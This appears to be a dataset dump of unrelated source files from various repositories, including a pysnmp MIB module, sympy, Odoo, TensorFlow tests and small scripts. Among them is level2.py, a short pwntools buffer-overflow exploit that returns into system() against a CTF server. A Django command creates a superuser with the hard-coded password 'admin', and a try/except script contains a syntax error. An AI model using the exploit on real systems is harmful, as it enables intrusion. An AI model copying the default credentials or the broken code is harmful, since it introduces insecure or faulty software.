nextBootSetStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2, 3), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nextBootSetStatus.setStatus('current')
nextBootLastSetResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nextBootLastSetResult.setStatus('current')
backupFirmware = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3))
backupVersion = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupVersion.setStatus('current')
backupPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3, 2), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: backupPath.setStatus('current')
backupSetStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3, 3), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupSetStatus.setStatus('current')
backupLastSetResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupLastSetResult.setStatus('current')
deviceConfiguration = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3))
runningConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 1))
runCnfgSaveAs = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 1, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: runCnfgSaveAs.setStatus('current')
runCnfgSaveAsStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 1, 2), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: runCnfgSaveAsStatus.setStatus('current')
runCnfgLastSaveResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: runCnfgLastSaveResult.setStatus('current')
nextBootConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2))
bootCnfgPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bootCnfgPath.setStatus('current')
bootCnfgExists = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bootCnfgExists.setStatus('current')
bootCnfgSetStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2, 3), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bootCnfgSetStatus.setStatus('current')
bootCnfgLastSetResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bootCnfgLastSetResult.setStatus('current')
defaultConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 3))
dfltCnfgPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 3, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: dfltCnfgPath.setStatus('current')
dfltCnfgExists = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 3, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: dfltCnfgExists.setStatus('current')
backupConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4))
backupCnfgPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: backupCnfgPath.setStatus('current')
backupCnfgExists = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupCnfgExists.setStatus('current')
backupCnfgSetStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4, 3), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupCnfgSetStatus.setStatus('current')
backupCnfgLastSetResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupCnfgLastSetResult.setStatus('current')
serviceConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 5))
srvcTelnetEnable = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 5, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: srvcTelnetEnable.setStatus('current')
srvcSshEnable = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 5, 2), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: srvcSshEnable.setStatus('current')
guiConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 6))
guiAppletConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 6, 1))
guiAppletSysSwVer = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 6, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: guiAppletSysSwVer.setStatus('current')
guiAppletSwVer = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 6, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: guiAppletSwVer.setStatus('current')
mibBuilder.exportSymbols("AT-SETUP-MIB", restartDevice=restartDevice, currSoftSaveStatus=currSoftSaveStatus, dfltCnfgPath=dfltCnfgPath, restartStkMemberDevice=restartStkMemberDevice, bootCnfgSetStatus=bootCnfgSetStatus, backupPath=backupPath, PYSNMP_MODULE_ID=setup, firmware=firmware, deviceConfiguration=deviceConfiguration, guiAppletConfig=guiAppletConfig, currSoftName=currSoftName, guiConfig=guiConfig, bootCnfgExists=bootCnfgExists, backupCnfgSetStatus=backupCnfgSetStatus, bootCnfgPath=bootCnfgPath, backupLastSetResult=backupLastSetResult, backupCnfgPath=backupCnfgPath, runningConfig=runningConfig, nextBootVersion=nextBootVersion, currSoftSaveAs=currSoftSaveAs, runCnfgSaveAsStatus=runCnfgSaveAsStatus, backupConfig=backupConfig, serviceConfig=serviceConfig, setup=setup, backupCnfgLastSetResult=backupCnfgLastSetResult, dfltCnfgExists=dfltCnfgExists, guiAppletSwVer=guiAppletSwVer, backupVersion=backupVersion, guiAppletSysSwVer=guiAppletSysSwVer, defaultConfig=defaultConfig, runCnfgSaveAs=runCnfgSaveAs, runCnfgLastSaveResult=runCnfgLastSaveResult, srvcSshEnable=srvcSshEnable, nextBootSetStatus=nextBootSetStatus, srvcTelnetEnable=srvcTelnetEnable, nextBootFirmware=nextBootFirmware, nextBootPath=nextBootPath, currentFirmware=currentFirmware, backupCnfgExists=backupCnfgExists, currSoftLastSaveResult=currSoftLastSaveResult, backupFirmware=backupFirmware, nextBootLastSetResult=nextBootLastSetResult, SystemFileOperationType=SystemFileOperationType, backupSetStatus=backupSetStatus, currSoftSaveToFile=currSoftSaveToFile, nextBootConfig=nextBootConfig, bootCnfgLastSetResult=bootCnfgLastSetResult, currSoftVersion=currSoftVersion)
| [
"[email protected]"
]
| |
ff09036b192720416dd122ea9562138c9f0394ce | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/2/gg_.py | 30cf80cef6a2d8b04f1644345692606c1376e383 | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'gg_':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
]
| |
606d8cfb72f406daa19f033514b6c0387ef8ccc6 | 4542db1d4955aaf7c53c9ff7282d064a066ff393 | /2020/December/20-Dec/command line argument,exception handling.py | 763d53a7e21443113b29d545b869e123aa5501e4 | []
| no_license | mohanbabu2706/100 | 7227527b0e0af1e4f69d194b7537c7aef27a810d | 3c5a8b769fd4205afb3e3fd7e9cbf2ebf053b7b9 | refs/heads/master | 2023-02-20T09:56:45.970290 | 2021-01-20T10:09:09 | 2021-01-20T10:09:09 | 297,233,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | #This program adds up integers that have been passed as arguments in the command line
import sys
try:
total = sum(int(arg)for arg in sys.argv[1:])
print('sum = ',total)
expect ValueError:
print('Please supply integer arguments')
| [
"[email protected]"
]
| |
4152263ec153a74dbe4b9a6e39b6c9bc8a66e341 | 9307c025d1611a9fd21b34543643a46a03a3d3a4 | /orcamentos/core/management/commands/create_admin.py | 220674e01324f0d30c05556b6c13f8580aa167ad | [
"MIT"
]
| permissive | projetosparalelos/orcamentos | 74892ae46bfd86a4e8196fa3feb15cb55692ef03 | af88f5a2b5d73f7ea6cf416d871714a0ebcdf252 | refs/heads/master | 2020-04-27T12:41:59.811244 | 2019-01-17T04:31:28 | 2019-01-17T04:31:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 886 | py | from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from orcamentos.crm.models import Employee
class Command(BaseCommand):
help = ''' Cria um usuário admin. '''
def handle(self, *args, **kwargs):
'''
Cria um Employee.
Precisamos de Employee para fazer todas as transações no sistema.
'''
username = 'admin'
first_name = 'Admin'
last_name = 'Admin'
email = '[email protected]'
user = Employee.objects.create(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
gender='I'
)
user.set_password('admin')
user.is_staff = True
user.is_superuser = True
user.is_active = True
user.save()
print('Usuário criado com sucesso.')
| [
"[email protected]"
]
| |
7d366690a2e18aece41ce666bb4da73a35298049 | 93713f46f16f1e29b725f263da164fed24ebf8a8 | /Library/lib/python3.7/site-packages/sympy/stats/stochastic_process.py | ad68ef5ac3b84750463e3b0a29e5a5de45eaf751 | [
"BSD-3-Clause"
]
| permissive | holzschu/Carnets | b83d15136d25db640cea023abb5c280b26a9620e | 1ad7ec05fb1e3676ac879585296c513c3ee50ef9 | refs/heads/master | 2023-02-20T12:05:14.980685 | 2023-02-13T15:59:23 | 2023-02-13T15:59:23 | 167,671,526 | 541 | 36 | BSD-3-Clause | 2022-11-29T03:08:22 | 2019-01-26T09:26:46 | Python | UTF-8 | Python | false | false | 2,228 | py | from __future__ import print_function, division
from sympy import Basic
from sympy.stats.joint_rv import ProductPSpace
from sympy.stats.rv import ProductDomain, _symbol_converter
class StochasticPSpace(ProductPSpace):
"""
Represents probability space of stochastic processes
and their random variables. Contains mechanics to do
computations for queries of stochastic processes.
Initialized by symbol, the specific process and
distribution(optional) if the random indexed symbols
of the process follows any specific distribution, like,
in Bernoulli Process, each random indexed symbol follows
Bernoulli distribution. For processes with memory, this
parameter should not be passed.
"""
def __new__(cls, sym, process, distribution=None):
sym = _symbol_converter(sym)
from sympy.stats.stochastic_process_types import StochasticProcess
if not isinstance(process, StochasticProcess):
raise TypeError("`process` must be an instance of StochasticProcess.")
return Basic.__new__(cls, sym, process, distribution)
@property
def process(self):
"""
The associated stochastic process.
"""
return self.args[1]
@property
def domain(self):
return ProductDomain(self.process.index_set,
self.process.state_space)
@property
def symbol(self):
return self.args[0]
@property
def distribution(self):
return self.args[2]
def probability(self, condition, given_condition=None, evaluate=True, **kwargs):
"""
Transfers the task of handling queries to the specific stochastic
process because every process has their own logic of handling such
queries.
"""
return self.process.probability(condition, given_condition, evaluate, **kwargs)
def compute_expectation(self, expr, condition=None, evaluate=True, **kwargs):
"""
Transfers the task of handling queries to the specific stochastic
process because every process has their own logic of handling such
queries.
"""
return self.process.expectation(expr, condition, evaluate, **kwargs)
| [
"[email protected]"
]
| |
054d37c07f6a302bf45d9cc67212e2cd1df7291a | 60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24 | /IronPythonStubs/release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/DistributionType.py | d38e3a744760d77f5c4751c442f58658e92cb577 | [
"MIT"
]
| permissive | shnlmn/Rhino-Grasshopper-Scripts | a9411098c5d1bbc55feb782def565d535b27b709 | 0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823 | refs/heads/master | 2020-04-10T18:59:43.518140 | 2020-04-08T02:49:07 | 2020-04-08T02:49:07 | 161,219,695 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 912 | py | class DistributionType(Enum,IComparable,IFormattable,IConvertible):
"""
The type of the distribution
enum DistributionType,values: Uniform (0),VaryingLength (1)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Uniform=None
value__=None
VaryingLength=None
| [
"[email protected]"
]
| |
5c43f2e8a875e9f1939b98e2c16527d7a369d9b7 | 7e40c8bb28c2cee8e023751557b90ef7ef518326 | /level2/level2.py | 6b6d4cb94b858331308d54c42e681b7377f549a3 | []
| no_license | 1337536723/buuctf_pwn | b6e5d65372ed0638a722faef1775026a89321fa3 | cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf | refs/heads/master | 2023-08-29T19:35:04.352530 | 2021-11-16T14:06:20 | 2021-11-16T14:06:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | from pwn import *
bin_addr = 0x0804a024
#p = process('./level2')
p = remote('node3.buuoj.cn', 26359)
elf = ELF('level2')
sys_addr = elf.plt['system']
p.recvuntil('Input:')
payload = b'a' * ( 0x88 + 4 ) + p32(sys_addr) + p32(0x123) + p32(bin_addr)
p.sendline(payload)
p.interactive()
| [
"[email protected]"
]
| |
c85b43f04745e322592dcd18a3f52120461d5379 | 95a534d8e0a3d29ae5224e7135f1961a14f2674d | /app/one_to_one/models.py | 45135b5ad8e389f9ac61ad03a44a9a63a3899105 | []
| no_license | mongkyo/prac-document | 7a96bfed1d62411dcf231376898f73b94bdb969f | 65a5331130feb3a0e135255c82ea8d2ba23d4ecc | refs/heads/master | 2020-03-31T08:06:43.134379 | 2018-10-11T17:40:42 | 2018-10-11T17:40:42 | 152,046,166 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | from django.db import models
class Place(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=80)
def __str__(self):
return f'{self.name} the place'
class Restaurant(models.Model):
place = models.OneToOneField(
Place,
on_delete=models.CASCADE,
primary_key=True,
)
serves_hot_dogs = models.BooleanField(default=False)
serves_pizza = models.BooleanField(default=False)
def __str__(self):
return f'{self.place.name} the restaurant'
class Waiter(models.Model):
restaurant = models.ForeignKey(
Restaurant,
on_delete=models.CASCADE,
)
name = models.CharField(max_length=50)
def __str__(self):
return f'{name} the waiter at {restaurant}'.formate(
name=self.name,
restaurant=self.restaurant,
)
| [
"[email protected]"
]
| |
64e08a3ae92f72b778581622471ad547fefae6dd | b284097fb7eda14307defe2dd19fe290a366a8b3 | /addons-vauxoo/invoice_cancel_iva/model/invoice.py | b868901d2963f3be0082d600541caff1c9bfe1db | []
| no_license | OpenBusinessSolutions/odoo-fondeur-server | 41420069e77b2faaf12c396e5d3d2a2c165a8ae2 | 9c588e45011a87ec8d9af73535c4c56485be92f7 | refs/heads/master | 2021-01-01T05:45:29.736682 | 2016-04-19T15:21:58 | 2016-04-19T15:21:58 | 56,607,743 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,060 | py | # coding: utf-8
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
# Credits######################################################
# Coded by: Vauxoo C.A.
# Planified by: Nhomar Hernandez
# Audited by: Vauxoo C.A.
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from openerp.osv import osv
from openerp.tools.translate import _
import openerp.workflow as workflow
class AccountInvoice(osv.Model):
_inherit = 'account.invoice'
#~ def action_cancel_draft(self, cr, uid, ids, *args):
#~
#~ wf_service = workflow
#~ res = super(account_invoice, self).action_cancel_draft(cr, uid, ids, ())
#~ for i in self.browse(cr,uid,ids,context={}):
#~ if i.wh_iva_id:
#~ wf_service.trg_validate(uid, 'account.wh.iva',i.wh_iva_id.id, 'set_to_draft', cr)
#~ return res
def action_number(self, cr, uid, ids, context=None):
'''
Modified to witholding vat validate
'''
wf_service = workflow
res = super(AccountInvoice, self).action_number(cr, uid, ids)
iva_line_obj = self.pool.get('account.wh.iva.line')
invo_brw = self.browse(cr, uid, ids, context=context)[0]
state = [('draft', 'set_to_draft'), (
'confirmed', 'wh_iva_confirmed'), ('done', 'wh_iva_done')]
if invo_brw.cancel_true:
if invo_brw.wh_iva_id:
iva_line_obj.load_taxes(cr, uid, [
i.id for i in invo_brw.wh_iva_id.wh_lines],
context=context)
for d in state:
if invo_brw.wh_iva_id.prev_state == 'cancel':
break
if not all([False for line in invo_brw.wh_iva_id.wh_lines
if not line.invoice_id.move_id]):
raise osv.except_osv(_('Error'), _(
'One of the bills involved in the vat retention\
has not been validated, because it does not\
have an associated retention'))
wf_service.trg_validate(
uid, 'account.wh.iva', invo_brw.wh_iva_id.id, d[1], cr)
if d[0] == invo_brw.wh_iva_id.prev_state:
break
return res
def invoice_cancel(self, cr, uid, ids, context=None):
if context is None:
context = {}
context.update({'iva': True})
iva_obj = self.pool.get('account.wh.iva')
invo_brw = self.browse(cr, uid, ids, context=context)[0]
if invo_brw.wh_iva_id:
iva_obj.write(cr, uid, [invo_brw.wh_iva_id.id], {
'prev_state': invo_brw.wh_iva_id.state},
context=context)
res = super(AccountInvoice, self).invoice_cancel(
cr, uid, ids, context=context)
return res
def check_iva(self, cr, uid, ids, context=None):
if context is None:
context = {}
invo_brw = self.browse(cr, uid, ids[0], context=context)
if invo_brw.wh_iva_id:
return False
return True
| [
"[email protected]"
]
| |
27dcc1afb9eef48f0b54eae6b5613fe0829275e1 | c3e10c7174f78a8ac2dc0823a1fcfa4c80afc67b | /1elinearsearch.py | 2cca16f64fbbb233b2f111ac68456068d9554835 | []
| no_license | PreritBhandari/python-programs-III | 3460c63e56ce6383d71ec594274c4b3edf984117 | eea3fbecae59b410971e11ff3a50504752cb60da | refs/heads/master | 2022-11-19T09:20:11.332556 | 2020-07-19T03:56:44 | 2020-07-19T03:56:44 | 280,787,593 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | # e) linear search
def LinearSearch(lys, element):
for i in range(len(lys)):
if lys[i] == element:
return i
return False
if __name__ == "__main__":
print(LinearSearch([1, 2, 3, 4, 5, 2, 1], 2))
| [
"[email protected]"
]
| |
42394a236222b49e0c60dc927584f9b29b99139a | f68d246ea82f980706bfa574da91d99797c29b38 | /activeCode/heap.py | 4d0a8944d04ab21537ff135bbd68862108086e79 | []
| no_license | nicolas4d/Problem-Solving-with-Algorithms-and-Data-Structures-using-Python | 40684370ab0c8a22894aa58c0479da6697ea0a13 | 5c7595cab3c5501e4b4177b700708a2609c74e30 | refs/heads/master | 2020-12-02T13:43:49.547926 | 2020-02-01T14:19:08 | 2020-02-01T14:19:08 | 231,025,645 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | from pythonds.trees import BinHeap
bh = BinHeap()
bh.insert(5)
bh.insert(7)
bh.insert(3)
bh.insert(11)
print(bh.delMin())
print(bh.delMin())
print(bh.delMin())
print(bh.delMin())
| [
"[email protected]"
]
| |
066227fc4417ba0fff2fa3345443eb2815dab4c4 | b23d294fdffabe72c336644f119860f5ce704eef | /python_1000phone/预科/day2-PIL/04-文字和颜色块.py | fa76439697eb6e145f5254e5ba57f3ea695b190c | []
| no_license | ikaros274556330/my_code | 65232758fd20820e9f4fa8cb5a6c91a1969862a2 | 92db21c4abcbd88b7bd77e78d9f660b4534b5071 | refs/heads/master | 2020-11-26T09:43:58.200990 | 2019-12-23T02:08:39 | 2019-12-23T02:08:39 | 229,032,315 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | """__author:吴佩隆"""
from PIL import Image,ImageFont,ImageDraw
# 1.文字水印 - 将文字渲染在图片上
# 准备图片
image1 = Image.open('./files/chiling.jpg')
# 准备文字
# 1)创建字体对象
# ImageFont.truetype(字体文件的路径,字体大小)
font1 = ImageFont.truetype('files/bb.ttf',80)
# 2)创建draw对象
# draw = ImageDraw.Draw(image1)
draw = ImageDraw.Draw(image1)
# 3)写
# draw.text(文字坐标,内容,(颜色),字体对象)
draw.text((0,0),'Hello Word!',(0,0,0),font1)
image1.show()
# 2.颜色块
image2 = Image.new('RGB',(200,50),(255,255,255))
# 1)创建draw对象
draw2 = ImageDraw.Draw(image2)
# 2)将图片上指定坐标设置为指定颜色
# draw2.point(坐标,颜色)
draw2.point((0,0),(255,0,0))
image2.show()
| [
"[email protected]"
]
| |
524ed7e94503183a799d610122964444c9b38b8e | 304033f60097c489cbc60aab639be45ccdbef1a5 | /algorithms/inflearn/section2/7.py | 6e47b9bfce07d3c94cfb462166a5a879c41312ce | []
| no_license | pgw928/TIL | 3d0c47c07bd1f5c73826daf8579a2b0e3f93cb95 | 765906f1e6eecad4ad8ec9bf704041433d7eb304 | refs/heads/master | 2023-06-29T05:46:30.039815 | 2021-08-10T17:38:11 | 2021-08-10T17:38:11 | 288,923,095 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | import sys
sys.stdin = open('section2/input.txt', 'rt')
n = int(input())
nums = [True]*(n+1)
nums[0], nums[1] = False, False
for i in range(2, n//2+1):
for j in range(2*i, n+1, i):
nums[j] = False
print(sum(nums)) | [
"[email protected]"
]
| |
2ac8ca7010ab02f782764f9cacfde68898b0dc49 | 10e94d77e56d9cbb979174795c465b679d03d6b3 | /tensorflow/contrib/learn/python/learn/estimators/estimator_test.py | 0acdbf20c3edc80fb0a163d9f7314403fed1882c | [
"Apache-2.0"
]
| permissive | pint1022/tf-coriander | 68939732c1ec0f052929c13ef6d8f49e44d423e4 | 197a685accca4a3f38285d6ac3ccf3998a200090 | refs/heads/master | 2020-04-14T18:56:40.334257 | 2019-01-11T00:40:11 | 2019-01-11T00:40:11 | 164,038,861 | 1 | 0 | Apache-2.0 | 2019-01-04T00:53:40 | 2019-01-04T00:53:40 | null | UTF-8 | Python | false | false | 22,385 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import tempfile
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.estimators import _sklearn
from tensorflow.contrib.learn.python.learn.estimators import estimator
_BOSTON_INPUT_DIM = 13
_IRIS_INPUT_DIM = 4
def boston_input_fn(num_epochs=None):
boston = tf.contrib.learn.datasets.load_boston()
features = tf.reshape(tf.constant(boston.data), [-1, _BOSTON_INPUT_DIM])
if num_epochs:
features = tf.train.limit_epochs(features, num_epochs=num_epochs)
target = tf.reshape(tf.constant(boston.target), [-1, 1])
return features, target
def iris_input_fn():
iris = tf.contrib.learn.datasets.load_iris()
features = tf.reshape(tf.constant(iris.data), [-1, _IRIS_INPUT_DIM])
target = tf.reshape(tf.constant(iris.target), [-1])
return features, target
def boston_eval_fn():
boston = tf.contrib.learn.datasets.load_boston()
n_examples = len(boston.target)
features = tf.reshape(
tf.constant(boston.data), [n_examples, _BOSTON_INPUT_DIM])
target = tf.reshape(tf.constant(boston.target), [n_examples, 1])
return tf.concat(0, [features, features]), tf.concat(0, [target, target])
def linear_model_params_fn(features, target, mode, params):
assert mode in ('train', 'eval', 'infer')
prediction, loss = (
tf.contrib.learn.models.linear_regression_zero_init(features, target)
)
train_op = tf.contrib.layers.optimize_loss(
loss, tf.contrib.framework.get_global_step(), optimizer='Adagrad',
learning_rate=params['learning_rate'])
return prediction, loss, train_op
def linear_model_fn(features, target, mode):
assert mode in ('train', 'eval', 'infer')
prediction, loss = (
tf.contrib.learn.models.linear_regression_zero_init(features, target)
)
train_op = tf.contrib.layers.optimize_loss(
loss, tf.contrib.framework.get_global_step(), optimizer='Adagrad',
learning_rate=0.1)
return prediction, loss, train_op
def logistic_model_no_mode_fn(features, target):
target = tf.one_hot(target, 3, 1, 0)
prediction, loss = (
tf.contrib.learn.models.logistic_regression_zero_init(features, target)
)
train_op = tf.contrib.layers.optimize_loss(
loss, tf.contrib.framework.get_global_step(), optimizer='Adagrad',
learning_rate=0.1)
return {'class': tf.argmax(prediction, 1), 'prob': prediction}, loss, train_op
class CheckCallsMonitor(tf.contrib.learn.monitors.BaseMonitor):
def __init__(self, expect_calls):
super(CheckCallsMonitor, self).__init__()
self.begin_calls = None
self.end_calls = None
self.expect_calls = expect_calls
def begin(self, max_steps):
self.begin_calls = 0
self.end_calls = 0
def step_begin(self, step):
self.begin_calls += 1
return {}
def step_end(self, step, outputs):
self.end_calls += 1
return False
def end(self):
assert (self.end_calls == self.expect_calls and
self.begin_calls == self.expect_calls)
class EstimatorTest(tf.test.TestCase):
def testCustomConfig(self):
test_random_seed = 5783452
class TestInput(object):
def __init__(self):
self.random_seed = 0
def config_test_input_fn(self):
self.random_seed = tf.get_default_graph().seed
return tf.constant([[1.]]), tf.constant([1.])
config = tf.contrib.learn.RunConfig(tf_random_seed=test_random_seed)
test_input = TestInput()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn, config=config)
est.fit(input_fn=test_input.config_test_input_fn, steps=1)
# If input_fn ran, it will have given us the random seed set on the graph.
self.assertEquals(test_random_seed, test_input.random_seed)
def testCheckInputs(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
# Lambdas so we have to different objects to compare
right_features = lambda: np.ones(shape=[7, 8], dtype=np.float32)
right_targets = lambda: np.ones(shape=[7, 10], dtype=np.int32)
est.fit(right_features(), right_targets(), steps=1)
# TODO(wicke): This does not fail for np.int32 because of data_feeder magic.
wrong_type_features = np.ones(shape=[7., 8.], dtype=np.int64)
wrong_size_features = np.ones(shape=[7, 10])
wrong_type_targets = np.ones(shape=[7., 10.], dtype=np.float32)
wrong_size_targets = np.ones(shape=[7, 11])
est.fit(x=right_features(), y=right_targets(), steps=1)
with self.assertRaises(ValueError):
est.fit(x=wrong_type_features, y=right_targets(), steps=1)
with self.assertRaises(ValueError):
est.fit(x=wrong_size_features, y=right_targets(), steps=1)
with self.assertRaises(ValueError):
est.fit(x=right_features(), y=wrong_type_targets, steps=1)
with self.assertRaises(ValueError):
est.fit(x=right_features(), y=wrong_size_targets, steps=1)
def testBadInput(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
self.assertRaisesRegexp(ValueError,
'Either x or input_fn must be provided.',
est.fit, x=None, input_fn=None)
self.assertRaisesRegexp(ValueError,
'Can not provide both input_fn and x or y',
est.fit, x='X', input_fn=iris_input_fn)
self.assertRaisesRegexp(ValueError,
'Can not provide both input_fn and x or y',
est.fit, y='Y', input_fn=iris_input_fn)
self.assertRaisesRegexp(ValueError,
'Can not provide both input_fn and batch_size',
est.fit, input_fn=iris_input_fn, batch_size=100)
self.assertRaisesRegexp(
ValueError, 'Inputs cannot be tensors. Please provide input_fn.',
est.fit, x=tf.constant(1.))
def testUntrained(self):
boston = tf.contrib.learn.datasets.load_boston()
